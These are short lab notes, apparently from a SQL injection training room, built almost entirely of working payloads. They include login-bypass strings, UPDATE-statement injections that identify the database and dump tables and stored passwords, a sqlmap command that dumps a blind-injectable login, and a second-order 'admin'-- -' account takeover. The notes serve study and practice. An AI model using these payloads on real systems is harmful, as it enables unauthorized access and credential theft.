---------------------------------
The parameter accepts an integer
---------------------------------
1 or 1=1-- -


-------------------------------
The parameter expects a string
-------------------------------
1' or '1'='1'-- -


-------------------------------------
Bypassed by going directly to the URL
-------------------------------------
http://10.10.158.245:5000/sesqli3/login?profileID=-1' or 1=1-- -&password=a


---------------
POST Injection
---------------
When submitting the login form, it uses the HTTP POST method. It is possible to either remove/disable the JavaScript validating the login form or submit a valid request and intercept it with a proxy tool such as Burp Suite and modify it


--------------------------------------------
SQL Injection Attack on an UPDATE Statement
--------------------------------------------
By looking at the web page's source code, we can identify potential column names by looking at the name attribute

try to identify what database is in use
# MySQL and MSSQL
',nickName=@@version,email='
# For Oracle
',nickName=(SELECT banner FROM v$version),email='
# For SQLite
',nickName=sqlite_version(),email='

enumerate the database by extracting all the tables
',nickName=(SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'),email='

extract all the column names from the usertable
',nickName=(SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='usertable'),email='

extract the data we want from the database
',nickName=(SELECT group_concat(profileID || "," || name || "," || password || ":") from usertable),email='


-----------------------------
SQLMap - Blind SQL Injection
-----------------------------
sqlmap -u http://10.10.158.245:5000/challenge3/login --data="username=admin&password=admin" --level=5 --risk=3 --dbms=sqlite --technique=b --dump


----------------
Change Password
----------------
To exploit this vulnerability and gain access to the admin's user account, we can create a user with the name admin'-- -.

After having registered the malicious user, we can update the password for our new user to trigger the vulnerability. When changing the password, the application executes two queries.

This means that instead of updating the password for admin' -- -, the application updated the password for the admin user. After having updated the password, it is possible to log in as admin with the new password


